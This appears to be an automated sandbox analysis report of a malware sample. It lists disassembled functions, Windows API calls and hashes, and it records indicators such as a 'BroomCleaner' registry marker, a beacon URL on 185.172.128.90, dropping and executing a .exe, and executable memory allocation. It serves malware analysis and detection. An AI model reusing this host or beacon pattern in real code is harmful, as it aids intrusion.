H, xrefs: 0041A4A4

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 693600e6575519d5232ec394ac030b5dd81d70dd39d7e28a8c319a74ab69f910
Instruction ID: 6253cfc56dbab61e205766efb0611ca8061eb8c5ebbdbf8fd01913e42387971c
Opcode Fuzzy Hash: 693600e6575519d5232ec394ac030b5dd81d70dd39d7e28a8c319a74ab69f910
Instruction Fuzzy Hash: A4A13632A041089FDF199F78D8517EE7BA1AB06324F14019EEC15EB391D7398DA2C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004192AD Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7455f818b0db2fde8e31381446929043f5d461325fffdbb46aed0dcd817dfcea
Instruction ID: c4abe014ee414803f6a4a6dca87339887fd42b2314c6943b79fa01ee0dc397dc
Opcode Fuzzy Hash: 7455f818b0db2fde8e31381446929043f5d461325fffdbb46aed0dcd817dfcea
Instruction Fuzzy Hash: 1CC13AB1E04249AFDB11CFA9C850BEE7BB1BF09314F04019AE954A7392C7389DC1CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0414003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0414024D

Strings

cess, xrefs: 0414018D
kernel32.dll, xrefs: 0414008F, 04140095

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: b47c96db895f4007dc23359b62bde7bf6677b9304391058e9481df81abb14c62
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: B7527974A00229DFDB64CF69C984BACBBB1BF49314F1480D9E94DAB351DB30AA85DF14

Uniqueness

Uniqueness Score: -1.00%

Function 0042615A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0042615F
RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 00426187
RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 0042620A
RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042622B

Strings

Installed, xrefs: 00426169, 00426197, 004261B6, 004261B7
SOFTWARE\BroomCleaner, xrefs: 00426167, 0042617A

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
Instruction ID: 7631ba6f6479b49e2955b4a66f7b67ea7b8ea0f8d2650bf46820f955d15f7583
Opcode Fuzzy Hash: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
Instruction Fuzzy Hash: F3319A71A00129EEDF149FA8DC94AFEBB78EB08348F44016EE80277281C7B11D05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404189 Relevance: 10.6, APIs: 7, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0040418E
std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
int.LIBCPMT ref: 004041B4

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 004041BD
std::_Facet_Register.LIBCPMT ref: 004041EE
std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
__CxxThrowException@8.LIBVCRUNTIME ref: 0040422A

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 361fc1b71d45246d246e84ef011ee978f208c0c02e1cbc670b2b90af33c601f8
Instruction ID: eeb1616ca6cccce41a0e0e35b82109652f5c3a79b41a9d78a32d17684d72b000
Opcode Fuzzy Hash: 361fc1b71d45246d246e84ef011ee978f208c0c02e1cbc670b2b90af33c601f8
Instruction Fuzzy Hash: AD119072A041289BCB04EBA5DC06AEE7774EF84358F10456FF915B72D1DB389A04C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00426510 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExA.SHELL32(?,.exe), ref: 00426552
WaitForSingleObject.KERNEL32(?,00008000), ref: 00426566
CloseHandle.KERNEL32(?), ref: 0042656F

Strings

.exe, xrefs: 0042651B

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 8ce7cd6e21d80bec1428d2ca161df36b0ad46b5534dc267783c352d5b9ba18c9
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 1B015A31E00218ABDF15DFA9E8459DDBBB8FF08340F418126F801A6260EB709A45CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00426242 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,0042590D,00000001,?,/ping.php?substr=%s), ref: 0042625D
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 00426275
FindCloseChangeNotification.KERNEL32(00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 0042627E

Strings

.exe, xrefs: 00426247

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID: .exe
API String ID: 3805958096-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 1160b3d028a4f0b3eb39880a7a2cc02b481a356c14d22bba427b687e2e61c155
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 19E06D72701224BBD7311B9AAC48FABBE6CEF86AA4F040165FB05D2110A6A1DC0197B8

Uniqueness

Uniqueness Score: -1.00%

Function 004163FD Relevance: 4.6, APIs: 3, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 00416453
GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 0041645D
__dosmaperr.LIBCMT ref: 00416488

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction ID: 375721714d43bc4782e6a43c23cd9332c59ec42f2299351a345cb8f3503d09eb
Opcode Fuzzy Hash: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction Fuzzy Hash: EA014E3360412016D6256635E8457FF67599B82738F2B017FFD188B2D2EB6CDCC2819D

Uniqueness

Uniqueness Score: -1.00%

Function 00419767 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
__dosmaperr.LIBCMT ref: 004197B1

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 463c5a4e2e0130166045ce025073959b6dc275ceb70bdf3037ed559d4bcdb5d5
Instruction ID: ffc3df5eb890e326191760c687c06a6ec256fa7eb9c4ce0b7ceac38b7dc3edc6
Opcode Fuzzy Hash: 463c5a4e2e0130166045ce025073959b6dc275ceb70bdf3037ed559d4bcdb5d5
Instruction Fuzzy Hash: 70012D36620119ABCB159F59DC059EE7B29DF85330B28024AFC219B2D0E6749C918798

Uniqueness

Uniqueness Score: -1.00%

Function 004264F9 Relevance: 4.5, APIs: 3, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 00426502
SysFreeString.OLEAUT32(?), ref: 00426507
CoUninitialize.OLE32 ref: 00426509

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: FreeString$Uninitialize
String ID:
API String ID: 1985688103-0
Opcode ID: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction ID: 20283bebf02f6add892787a5acbccff6c180d450b55e9b59979360a618d6bcd4
Opcode Fuzzy Hash: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction Fuzzy Hash: A6B09230D02029ABEF22AB62EE0D45C7F32FF40350F410061F405332308B351D22EE88

Uniqueness

Uniqueness Score: -1.00%

Function 00419CC3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Strings

@, xrefs: 00419D84

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: CreateFile
String ID: @
API String ID: 823142352-2766056989
Opcode ID: 30582e01feb3ea99a973a783d27ef441fc8a1aac78a09caaa55a892fc09236fc
Instruction ID: 6e2d9e324c610adb1979779f65b1bd98f37231a06814a81205b09b8777469d26
Opcode Fuzzy Hash: 30582e01feb3ea99a973a783d27ef441fc8a1aac78a09caaa55a892fc09236fc
Instruction Fuzzy Hash: 4D61E671900209AAEF259E28ECA1BFF3659DB01324F280667F914D63E1D37DCDD1C299

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081

Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

v*@, xrefs: 00401BD0

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
String ID: v*@
API String ID: 3966877926-3062513736
Opcode ID: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction ID: cee5f8951f4aa60660b8f0772aceb561b5f660f34992c4678438f01180239965
Opcode Fuzzy Hash: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction Fuzzy Hash: FC218EB1611106AFD708DF59C849A6AB7F9FF48348F14822EE116A7341C7B8DD008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042604A Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042604F

Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 420165198-0
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: 115bff912634c1bae9a386948b342ebf01da51d0a41a8c3d45e1fed53d0017c0
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: 3531F770D01119EBDB14EF95E985AEDFBB4FF48304F1081AEE405B3681DB786A04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 04140E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,04140223,?,?), ref: 04140E19
SetErrorMode.KERNEL32(00000000,?,?,04140223,?,?), ref: 04140E1E

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: be7f62ea2db41a16a342eb67c89fed2bbce224ed73de3f70166da053bfa159c9
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 18D0123124512877D7002B95DC09BCD7F1CDF09B62F008051FB0DE9080C770964046E5

Uniqueness

Uniqueness Score: -1.00%

Function 0041878B Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa999323bafbc2594b0c48ced461f1796886116cb5ad27cd811abb6661ac4478
Instruction ID: 7f647bd7b68c58480356602612fa02c60fce203f31c4afd0b56fb408a9d690c1
Opcode Fuzzy Hash: fa999323bafbc2594b0c48ced461f1796886116cb5ad27cd811abb6661ac4478
Instruction Fuzzy Hash: 2851F771A00108AFDB10DF69C840BFA7BA5EF85364F59815EE8489B392CB39DD82C795

Uniqueness

Uniqueness Score: -1.00%

Function 00401F2B Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00402008

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction ID: 92d79e160b507baa56e58511ea190f57013b3733b8d645c4d1d18e9f5b661b4d
Opcode Fuzzy Hash: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction Fuzzy Hash: EA317C31604706AFD710DE29C884A5ABBA0BF88354F04863FFD54A73A1D779D854CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004024A1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004024A6

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: Exception@8H_prologThrowstd::system_error::system_error
String ID:
API String ID: 938716162-0
Opcode ID: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction ID: 74f8325a11d62ea13fad7549c786a5ed5267532987f834d27d08a699b4d18117
Opcode Fuzzy Hash: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction Fuzzy Hash: C3318B71A00505AFCB18DF29C9D5EAAB7F5FF84318718C16EE416AB791C634EC00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040257C Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402581

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction ID: 2a6667c304d01eacddf9d20035e77db0555498f4c479ac31cd54c3f05400b439
Opcode Fuzzy Hash: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction Fuzzy Hash: D9319870A00615AFCB15DF09CA84A9EBBB1FF48314F14856EE415AB791C7B9ED40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402403 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402408

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction ID: acc1f40cfc044376a2f11a90f6c11c43800a5431404741bf8f8bd34e997dcd85
Opcode Fuzzy Hash: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction Fuzzy Hash: 0F218E70601611DFC728DF15C54896ABBF5FF88314B10C26DE85A9B7A1C770EE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041AED0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0041AF0E

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction ID: 1154e27c015a897812a0a5709c6716ad0e12ceb5b9437c51957f638709d22443
Opcode Fuzzy Hash: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction Fuzzy Hash: 68114C71904209AFCF05DF58E9419DB7BF4EF48314F10409AF808AB311D631D9618BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13643555ea150916878c583df0512c733e0c47517646bb032251a44ff8f984d0
Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
Opcode Fuzzy Hash: 13643555ea150916878c583df0512c733e0c47517646bb032251a44ff8f984d0
Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F6B Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
String ID:
API String ID: 3585332825-0
Opcode ID: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction ID: 08e3709e77e7d1eb8e6a734fcd7c8cb2ed90b0a3f4c6ef6dd5fb35cf0d7a5197
Opcode Fuzzy Hash: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction Fuzzy Hash: 80018F70A10114AFDB14EB25DA4ABAE77F9AF04708F00403EF405B76D1DBF8AE008B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D1 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041A212

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction ID: 12cd10f48dc7b96564373969defca7bad1702ec24c59837b56aad39c86ff4cfc
Opcode Fuzzy Hash: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction Fuzzy Hash: AFF09A32511119BBCF005E96DC02CDA3B6EEF89334F100156F91492150DA3ADD60A7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00417A45 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7e3c3b2e03c3d6e18dbbb536e19013ee5f5a2c75f1da2fa632e63c4bac1336c5
Instruction ID: 1d8c2cfb616aaf75abf93827710d27348e1db2613881ba842acdabaabffa5ab7
Opcode Fuzzy Hash: 7e3c3b2e03c3d6e18dbbb536e19013ee5f5a2c75f1da2fa632e63c4bac1336c5
Instruction Fuzzy Hash: 4BE0A03168822557A72026629C04BDF6669AF417E0F150223AC04962A0CB6C8FD181ED

Uniqueness

Uniqueness Score: -1.00%

Function 00409256 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00409967

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 25d8b0dcc0aeb082a63c197dce86bf9214427bbe7c1bc7486ec08e7daa717c4d
Instruction ID: 8f33375d03ef340e879cf663a0733e21cf849d267f07301eb1b68e0c667a0042
Opcode Fuzzy Hash: 25d8b0dcc0aeb082a63c197dce86bf9214427bbe7c1bc7486ec08e7daa717c4d
Instruction Fuzzy Hash: 1FE0923440430DB6CF007A66E8169AE772C1E04324B20497FB928B56E2EF78DD96C18E

Uniqueness

Uniqueness Score: -1.00%

Function 00419F10 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction ID: 9d2ef54cfd7c3626aa2ff180f2ecc7fa707dd95b0fec4855ab8d986de787a24b
Opcode Fuzzy Hash: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction Fuzzy Hash: E9D06C3210010DBBDF128F85DC06EDA3BAAFB4C714F014010FA1856020C732E832EB94

Uniqueness

Uniqueness Score: -1.00%

Function 041E5895 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 041E58E6

Memory Dump Source

Source File: 00000000.00000002.2368576914.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 041E5000, based on PE: false

Joe Sandbox IDA Plugin

